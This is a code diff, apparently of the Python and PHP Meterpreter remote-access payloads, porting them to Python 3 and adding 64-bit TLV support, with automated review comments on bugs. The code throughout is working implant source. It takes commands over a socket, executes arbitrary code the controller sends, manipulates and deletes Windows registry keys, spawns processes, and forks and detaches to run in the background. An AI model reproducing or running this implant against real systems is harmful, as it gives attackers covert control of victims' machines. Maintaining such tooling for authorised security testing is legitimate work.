iface_info['mtu'] = AdapterAddresses.Mtu
|
||||
pUniAddr = AdapterAddresses.FirstUnicastAddress
|
||||
while pUniAddr:
|
||||
|
@ -1174,7 +1209,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
|
|||
table_data = ctypes.string_at(table, pdwSize.value)
|
||||
entries = struct.unpack('I', table_data[:4])[0]
|
||||
table_data = table_data[4:]
|
||||
for i in xrange(entries):
|
||||
for i in range(entries):
|
||||
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
|
||||
ifrow = MIB_IFROW()
|
||||
ifrow.dwIndex = addrrow.dwIndex
|
||||
|
@ -1244,9 +1279,10 @@ def stdapi_registry_close_key(request, response):
|
|||
def stdapi_registry_create_key(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
||||
res_key = ctypes.c_void_p()
|
||||
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
|
||||
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
|
||||
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
|
||||
return ERROR_SUCCESS, response
|
||||
return ERROR_FAILURE, response
|
||||
|
@ -1255,18 +1291,20 @@ def stdapi_registry_create_key(request, response):
|
|||
def stdapi_registry_delete_key(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
|
||||
if (flags & DELETE_KEY_FLAG_RECURSIVE):
|
||||
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
|
||||
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
|
||||
else:
|
||||
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
|
||||
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
|
||||
return result, response
|
||||
|
||||
@meterpreter.register_function_windll
|
||||
def stdapi_registry_delete_value(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
|
||||
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
|
||||
return result, response
|
||||
|
||||
@meterpreter.register_function_windll
|
||||
|
@ -1335,9 +1373,10 @@ def stdapi_registry_load_key(request, response):
|
|||
def stdapi_registry_open_key(request, response):
|
||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
||||
handle_id = ctypes.c_void_p()
|
||||
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
|
||||
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
|
||||
response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
|
||||
return ERROR_SUCCESS, response
|
||||
return ERROR_FAILURE, response
|
||||
|
@ -1367,24 +1406,26 @@ def stdapi_registry_query_class(request, response):
|
|||
|
||||
@meterpreter.register_function_windll
|
||||
def stdapi_registry_query_value(request, response):
|
||||
REG_SZ = 1
|
||||
REG_DWORD = 4
|
||||
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||
value_type = ctypes.c_uint32()
|
||||
value_type.value = 0
|
||||
value_data = (ctypes.c_ubyte * 4096)()
|
||||
value_data_sz = ctypes.c_uint32()
|
||||
value_data_sz.value = ctypes.sizeof(value_data)
|
||||
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
|
||||
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
|
||||
if result == ERROR_SUCCESS:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
|
||||
if value_type.value == REG_SZ:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
|
||||
elif value_type.value == REG_DWORD:
|
||||
if value_type.value == winreg.REG_SZ:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
|
||||
elif value_type.value == winreg.REG_DWORD:
|
||||
value = value_data[:4]
|
||||
value.reverse()
|
||||
value = ''.join(map(chr, value))
|
||||
if sys.version_info[0] < 3:
|
||||
value = ''.join(map(chr, value))
|
||||
else:
|
||||
value = bytes(value)
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
|
||||
else:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
|
||||
|
@ -1395,9 +1436,10 @@ def stdapi_registry_query_value(request, response):
|
|||
def stdapi_registry_set_value(request, response):
|
||||
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
|
||||
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
|
||||
result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
|
||||
result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
|
||||
return result, response
|
||||
|
||||
@meterpreter.register_function_windll
|
||||
|
|
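Review bot: `if os.path.exists(file_path): os.unlink(file_path)` in stdapi_fs_delete_file returns ERROR_SUCCESS without removing a dangling symlink, because os.path.exists follows the link and reports False for it; the right test is `if os.path.lexists(file_path):`. The same guard also turns a missing file into a silent success that the caller cannot distinguish from a real delete, so if that is intended it deserves a comment. Separately, in netlink_request (whose head is outside the hunk) the loop slices `response.len - 16` bytes from `raw_response_data` and then unpacks the next NLMSGHDR without checking that at least ctypes.sizeof(NLMSGHDR) bytes remain, so a message split across two recv() calls would appear to be parsed from a truncated buffer — hedged, since cstruct_unpack's behaviour on short input is not visible here.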
|
@ -125,6 +125,7 @@ define("TLV_META_TYPE_STRING", (1 << 16));
|
|||
define("TLV_META_TYPE_UINT", (1 << 17));
|
||||
define("TLV_META_TYPE_RAW", (1 << 18));
|
||||
define("TLV_META_TYPE_BOOL", (1 << 19));
|
||||
define("TLV_META_TYPE_QWORD", (1 << 20));
|
||||
define("TLV_META_TYPE_COMPRESSED", (1 << 29));
|
||||
define("TLV_META_TYPE_GROUP", (1 << 30));
|
||||
define("TLV_META_TYPE_COMPLEX", (1 << 31));
|
||||
|
@ -655,6 +656,11 @@ function tlv_pack($tlv) {
|
|||
if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
|
||||
$ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
|
||||
}
|
||||
elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
|
||||
$hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
|
||||
$lo = $tlv['value'] & 0xFFFFFFFF;
|
||||
$ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
|
||||
}
|
||||
elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
|
||||
$ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
|
||||
}
|
||||
|
@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
|
|||
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
|
||||
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
|
||||
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
|
||||
# PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
|
||||
# NULL, so catch that here
|
||||
$tlv['value'] = str_replace("\0", "", $tlv['value']);
|
||||
}
|
||||
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
|
||||
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
|
||||
}
|
||||
elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
|
||||
$tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
|
||||
$tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
|
||||
}
|
||||
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
|
||||
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
|
||||
}
|
||||
|
@ -911,7 +924,8 @@ function read($resource, $len=null) {
|
|||
$r = Array($resource);
|
||||
my_print("Calling select to see if there's data on $resource");
|
||||
while (true) {
|
||||
$cnt = stream_select($r, $w=NULL, $e=NULL, 0);
|
||||
$w=NULL;$e=NULL;$t=0;
|
||||
$cnt = stream_select($r, $w, $e, $t);
|
||||
|
||||
# Stream is not ready to read, have to live with what we've gotten
|
||||
# so far
|
||||
|
@ -1147,7 +1161,8 @@ add_reader($msgsock);
|
|||
# Main dispatch loop
|
||||
#
|
||||
$r=$GLOBALS['readers'];
|
||||
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
|
||||
$w=NULL;$e=NULL;$t=1;
|
||||
while (false !== ($cnt = select($r, $w, $e, $t))) {
|
||||
#my_print(sprintf("Returned from select with %s readers", count($r)));
|
||||
$read_failed = false;
|
||||
for ($i = 0; $i < $cnt; $i++) {
|
||||
|
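Review bot: The QWORD branches added to tlv_pack (`$hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;`) and tlv_unpack (`$tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];`) only work on a 64-bit PHP build; with a 32-bit PHP_INT_SIZE a shift by 32 cannot produce the intended halves and the reassembled value silently overflows. A guard such as `if (PHP_INT_SIZE < 8) { my_print('QWORD TLVs require 64-bit PHP'); }` next to the new constant, or at least a comment stating the 64-bit assumption, would make the limitation explicit. The stream_select changes (`$w=NULL;$e=NULL;$t=0;`) correctly stop passing temporaries by reference, but a short comment such as `# stream_select takes its arguments by reference` would explain the otherwise odd-looking assignments in both the read() hunk and the main dispatch loop. The enclosing tlv_pack, tlv_unpack and read functions start and end outside the shown hunks.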
|
|
@ -1,12 +1,5 @@
|
|||
#!/usr/bin/python
|
||||
import code
|
||||
try:
|
||||
import ctypes
|
||||
except:
|
||||
has_windll = False
|
||||
else:
|
||||
has_windll = hasattr(ctypes, 'windll')
|
||||
|
||||
import os
|
||||
import random
|
||||
import select
|
||||
|
@ -15,10 +8,30 @@ import struct
|
|||
import subprocess
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
|
||||
try:
|
||||
import ctypes
|
||||
except ImportError:
|
||||
has_windll = False
|
||||
else:
|
||||
has_windll = hasattr(ctypes, 'windll')
|
||||
|
||||
if sys.version_info[0] < 3:
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, str)
|
||||
bytes = lambda *args: str(*args[:1])
|
||||
NULL_BYTE = '\x00'
|
||||
else:
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
|
||||
str = lambda x: __builtins__['str'](x, 'UTF-8')
|
||||
NULL_BYTE = bytes('\x00', 'UTF-8')
|
||||
|
||||
#
|
||||
# Constants
|
||||
#
|
||||
DEBUGGING = False
|
||||
|
||||
PACKET_TYPE_REQUEST = 0
|
||||
PACKET_TYPE_RESPONSE = 1
|
||||
PACKET_TYPE_PLAIN_REQUEST = 10
|
||||
|
@ -41,6 +54,7 @@ TLV_META_TYPE_STRING = (1 << 16)
|
|||
TLV_META_TYPE_UINT = (1 << 17)
|
||||
TLV_META_TYPE_RAW = (1 << 18)
|
||||
TLV_META_TYPE_BOOL = (1 << 19)
|
||||
TLV_META_TYPE_QWORD = (1 << 20)
|
||||
TLV_META_TYPE_COMPRESSED = (1 << 29)
|
||||
TLV_META_TYPE_GROUP = (1 << 30)
|
||||
TLV_META_TYPE_COMPLEX = (1 << 31)
|
||||
|
@ -100,6 +114,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
|
|||
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
|
||||
|
||||
EXPORTED_SYMBOLS = {}
|
||||
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
|
||||
|
||||
def export(symbol):
|
||||
EXPORTED_SYMBOLS[symbol.__name__] = symbol
|
||||
|
@ -107,7 +122,7 @@ def export(symbol):
|
|||
|
||||
def generate_request_id():
|
||||
chars = 'abcdefghijklmnopqrstuvwxyz'
|
||||
return ''.join(random.choice(chars) for x in xrange(32))
|
||||
return ''.join(random.choice(chars) for x in range(32))
|
||||
|
||||
@export
|
||||
def inet_pton(family, address):
|
||||
|
@ -125,25 +140,6 @@ def inet_pton(family, address):
|
|||
return ''.join(map(chr, lpAddress[8:24]))
|
||||
raise Exception('no suitable inet_pton functionality is available')
|
||||
|
||||
@export
|
||||
def packet_get_tlv(pkt, tlv_type):
|
||||
offset = 0
|
||||
while (offset < len(pkt)):
|
||||
tlv = struct.unpack('>II', pkt[offset:offset+8])
|
||||
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
|
||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
val = val.split('\x00', 1)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
val = struct.unpack('>I', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
val = bool(struct.unpack('b', val)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
pass
|
||||
return {'type':tlv[1], 'length':tlv[0], 'value':val}
|
||||
offset += tlv[0]
|
||||
return {}
|
||||
|
||||
@export
|
||||
def packet_enum_tlvs(pkt, tlv_type = None):
|
||||
offset = 0
|
||||
|
@ -152,9 +148,11 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
|||
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
|
||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
val = val.split('\x00', 1)[0]
|
||||
val = str(val.split(NULL_BYTE, 1)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
val = struct.unpack('>I', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
|
||||
val = struct.unpack('>Q', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
val = bool(struct.unpack('b', val)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
|
@ -163,6 +161,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
|||
offset += tlv[0]
|
||||
raise StopIteration()
|
||||
|
||||
@export
|
||||
def packet_get_tlv(pkt, tlv_type):
|
||||
try:
|
||||
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
|
||||
except IndexError:
|
||||
return {}
|
||||
return tlv
|
||||
|
||||
@export
|
||||
def tlv_pack(*args):
|
||||
if len(args) == 2:
|
||||
|
@ -170,20 +176,35 @@ def tlv_pack(*args):
|
|||
else:
|
||||
tlv = args[0]
|
||||
data = ""
|
||||
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
|
||||
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
|
||||
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
|
||||
data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
|
||||
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
|
||||
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
|
||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
|
||||
else:
|
||||
value = tlv['value']
|
||||
if not is_bytes(value):
|
||||
value = bytes(value, 'UTF-8')
|
||||
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
|
||||
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
|
||||
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
|
||||
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||
return data
|
||||
|
||||
#@export
|
||||
class MeterpreterFile(object):
|
||||
def __init__(self, file_obj):
|
||||
self.file_obj = file_obj
|
||||
|
||||
def __getattr__(self, name):
|
||||
return getattr(self.file_obj, name)
|
||||
export(MeterpreterFile)
|
||||
|
||||
#@export
|
||||
class MeterpreterSocket(object):
|
||||
def __init__(self, sock):
|
||||
|
@ -208,11 +229,11 @@ class STDProcessBuffer(threading.Thread):
|
|||
threading.Thread.__init__(self)
|
||||
self.std = std
|
||||
self.is_alive = is_alive
|
||||
self.data = ''
|
||||
self.data = bytes()
|
||||
self.data_lock = threading.RLock()
|
||||
|
||||
def run(self):
|
||||
for byte in iter(lambda: self.std.read(1), ''):
|
||||
for byte in iter(lambda: self.std.read(1), bytes()):
|
||||
self.data_lock.acquire()
|
||||
self.data += byte
|
||||
self.data_lock.release()
|
||||
|
@ -220,15 +241,20 @@ class STDProcessBuffer(threading.Thread):
|
|||
def is_read_ready(self):
|
||||
return len(self.data) != 0
|
||||
|
||||
def read(self, l = None):
|
||||
data = ''
|
||||
def peek(self, l = None):
|
||||
data = bytes()
|
||||
self.data_lock.acquire()
|
||||
if l == None:
|
||||
data = self.data
|
||||
self.data = ''
|
||||
else:
|
||||
data = self.data[0:l]
|
||||
self.data = self.data[l:]
|
||||
self.data_lock.release()
|
||||
return data
|
||||
|
||||
def read(self, l = None):
|
||||
self.data_lock.acquire()
|
||||
data = self.peek(l)
|
||||
self.data = self.data[len(data):]
|
||||
self.data_lock.release()
|
||||
return data
|
||||
|
||||
|
@ -236,12 +262,25 @@ class STDProcessBuffer(threading.Thread):
|
|||
class STDProcess(subprocess.Popen):
|
||||
def __init__(self, *args, **kwargs):
|
||||
subprocess.Popen.__init__(self, *args, **kwargs)
|
||||
self.echo_protection = False
|
||||
|
||||
def start(self):
|
||||
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
|
||||
self.stdout_reader.start()
|
||||
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
|
||||
self.stderr_reader.start()
|
||||
|
||||
def write(self, channel_data):
|
||||
self.stdin.write(channel_data)
|
||||
self.stdin.flush()
|
||||
if self.echo_protection:
|
||||
end_time = time.time() + 0.5
|
||||
out_data = bytes()
|
||||
while (time.time() < end_time) and (out_data != channel_data):
|
||||
if self.stdout_reader.is_read_ready():
|
||||
out_data = self.stdout_reader.peek(len(channel_data))
|
||||
if out_data == channel_data:
|
||||
self.stdout_reader.read(len(channel_data))
|
||||
export(STDProcess)
|
||||
|
||||
class PythonMeterpreter(object):
|
||||
|
@ -251,7 +290,7 @@ class PythonMeterpreter(object):
|
|||
self.channels = {}
|
||||
self.interact_channels = []
|
||||
self.processes = {}
|
||||
for func in filter(lambda x: x.startswith('_core'), dir(self)):
|
||||
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
|
||||
self.extension_functions[func[1:]] = getattr(self, func)
|
||||
self.running = True
|
||||
|
||||
|
@ -265,6 +304,7 @@ class PythonMeterpreter(object):
|
|||
return func
|
||||
|
||||
def add_channel(self, channel):
|
||||
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
|
||||
idx = 0
|
||||
while idx in self.channels:
|
||||
idx += 1
|
||||
|
@ -286,7 +326,7 @@ class PythonMeterpreter(object):
|
|||
break
|
||||
req_length, req_type = struct.unpack('>II', request)
|
||||
req_length -= 8
|
||||
request = ''
|
||||
request = bytes()
|
||||
while len(request) < req_length:
|
||||
request += self.socket.recv(4096)
|
||||
response = self.create_response(request)
|
||||
|
@ -294,17 +334,17 @@ class PythonMeterpreter(object):
|
|||
else:
|
||||
channels_for_removal = []
|
||||
# iterate over the keys because self.channels could be modified if one is closed
|
||||
channel_ids = self.channels.keys()
|
||||
channel_ids = list(self.channels.keys())
|
||||
for channel_id in channel_ids:
|
||||
channel = self.channels[channel_id]
|
||||
data = ''
|
||||
data = bytes()
|
||||
if isinstance(channel, STDProcess):
|
||||
if not channel_id in self.interact_channels:
|
||||
continue
|
||||
if channel.stdout_reader.is_read_ready():
|
||||
data = channel.stdout_reader.read()
|
||||
elif channel.stderr_reader.is_read_ready():
|
||||
if channel.stderr_reader.is_read_ready():
|
||||
data = channel.stderr_reader.read()
|
||||
elif channel.stdout_reader.is_read_ready():
|
||||
data = channel.stdout_reader.read()
|
||||
elif channel.poll() != None:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
elif isinstance(channel, MeterpreterSocketClient):
|
||||
|
@ -312,7 +352,7 @@ class PythonMeterpreter(object):
|
|||
try:
|
||||
d = channel.recv(1)
|
||||
except socket.error:
|
||||
d = ''
|
||||
d = bytes()
|
||||
if len(d) == 0:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
break
|
||||
|
@ -357,13 +397,13 @@ class PythonMeterpreter(object):
|
|||
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
|
||||
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
||||
return ERROR_FAILURE
|
||||
preloadlib_methods = self.extension_functions.keys()
|
||||
preloadlib_methods = list(self.extension_functions.keys())
|
||||
symbols_for_extensions = {'meterpreter':self}
|
||||
symbols_for_extensions.update(EXPORTED_SYMBOLS)
|
||||
i = code.InteractiveInterpreter(symbols_for_extensions)
|
||||
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
||||
postloadlib_methods = self.extension_functions.keys()
|
||||
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
|
||||
postloadlib_methods = list(self.extension_functions.keys())
|
||||
new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
|
||||
for method in new_methods:
|
||||
response += tlv_pack(TLV_TYPE_METHOD, method)
|
||||
return ERROR_SUCCESS, response
|
||||
|
@ -386,10 +426,10 @@ class PythonMeterpreter(object):
|
|||
if channel_id not in self.channels:
|
||||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
if isinstance(channel, file):
|
||||
channel.close()
|
||||
elif isinstance(channel, subprocess.Popen):
|
||||
if isinstance(channel, subprocess.Popen):
|
||||
channel.kill()
|
||||
elif isinstance(channel, MeterpreterFile):
|
||||
channel.close()
|
||||
elif isinstance(channel, MeterpreterSocket):
|
||||
channel.close()
|
||||
else:
|
||||
|
@ -405,7 +445,7 @@ class PythonMeterpreter(object):
|
|||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
result = False
|
||||
if isinstance(channel, file):
|
||||
if isinstance(channel, MeterpreterFile):
|
||||
result = channel.tell() >= os.fstat(channel.fileno()).st_size
|
||||
response += tlv_pack(TLV_TYPE_BOOL, result)
|
||||
return ERROR_SUCCESS, response
|
||||
|
@ -432,13 +472,13 @@ class PythonMeterpreter(object):
|
|||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
data = ''
|
||||
if isinstance(channel, file):
|
||||
data = channel.read(length)
|
||||
elif isinstance(channel, STDProcess):
|
||||
if isinstance(channel, STDProcess):
|
||||
if channel.poll() != None:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
if channel.stdout_reader.is_read_ready():
|
||||
data = channel.stdout_reader.read(length)
|
||||
elif isinstance(channel, MeterpreterFile):
|
||||
data = channel.read(length)
|
||||
elif isinstance(channel, MeterpreterSocket):
|
||||
data = channel.recv(length)
|
||||
else:
|
||||
|
@ -454,13 +494,13 @@ class PythonMeterpreter(object):
|
|||
return ERROR_FAILURE, response
|
||||
channel = self.channels[channel_id]
|
||||
l = len(channel_data)
|
||||
if isinstance(channel, file):
|
||||
channel.write(channel_data)
|
||||
elif isinstance(channel, subprocess.Popen):
|
||||
if isinstance(channel, subprocess.Popen):
|
||||
if channel.poll() != None:
|
||||
self.handle_dead_resource_channel(channel_id)
|
||||
return ERROR_FAILURE, response
|
||||
channel.stdin.write(channel_data)
|
||||
channel.write(channel_data)
|
||||
elif isinstance(channel, MeterpreterFile):
|
||||
channel.write(channel_data)
|
||||
elif isinstance(channel, MeterpreterSocket):
|
||||
try:
|
||||
l = channel.send(channel_data)
|
||||
|
@ -485,13 +525,17 @@ class PythonMeterpreter(object):
|
|||
if handler_name in self.extension_functions:
|
||||
handler = self.extension_functions[handler_name]
|
||||
try:
|
||||
#print("[*] running method {0}".format(handler_name))
|
||||
if DEBUGGING:
|
||||
print('[*] running method ' + handler_name)
|
||||
result, resp = handler(request, resp)
|
||||
except Exception, err:
|
||||
#print("[-] method {0} resulted in an error".format(handler_name))
|
||||
except Exception:
|
||||
if DEBUGGING:
|
||||
print('[-] method ' + handler_name + ' resulted in an error')
|
||||
traceback.print_exc(file=sys.stderr)
|
||||
result = ERROR_FAILURE
|
||||
else:
|
||||
#print("[-] method {0} was requested but does not exist".format(handler_name))
|
||||
if DEBUGGING:
|
||||
print('[-] method ' + handler_name + ' was requested but does not exist')
|
||||
result = ERROR_FAILURE
|
||||
resp += tlv_pack(TLV_TYPE_RESULT, result)
|
||||
resp = struct.pack('>I', len(resp) + 4) + resp
|
||||
|
@ -499,6 +543,9 @@ class PythonMeterpreter(object):
|
|||
|
||||
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
|
||||
if hasattr(os, 'setsid'):
|
||||
os.setsid()
|
||||
try:
|
||||
os.setsid()
|
||||
except OSError:
|
||||
pass
|
||||
met = PythonMeterpreter(s)
|
||||
met.run()
|
||||
|
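Review bot: The Python 3 branch `str = lambda x: __builtins__['str'](x, 'UTF-8')` rebinds the module-wide `str`, so any later `str(<int>)` or `str(<object>)` in this file raises TypeError, and `__builtins__` is only a dict when the file runs as `__main__` (when imported it is a module and the subscript fails). Give the helper its own name defined in both branches, e.g. `to_str = lambda x: x.decode('UTF-8')` under Python 3 and `to_str = lambda x: x` under Python 2, and use it at the decoding call sites such as `val = str(val.split(NULL_BYTE, 1)[0])` in packet_enum_tlvs. Separately, packet_enum_tlvs still ends its generator with `raise StopIteration()`; under PEP 479 (Python 3.7+) that becomes RuntimeError, so a plain `return` is the portable form. The echo-protection loop added to STDProcess.write spins for up to 0.5 s without yielding; a `time.sleep(0.01)` inside the while would avoid burning a core while waiting for the reader thread. The enclosing class and function definitions start outside the shown hunks.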
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
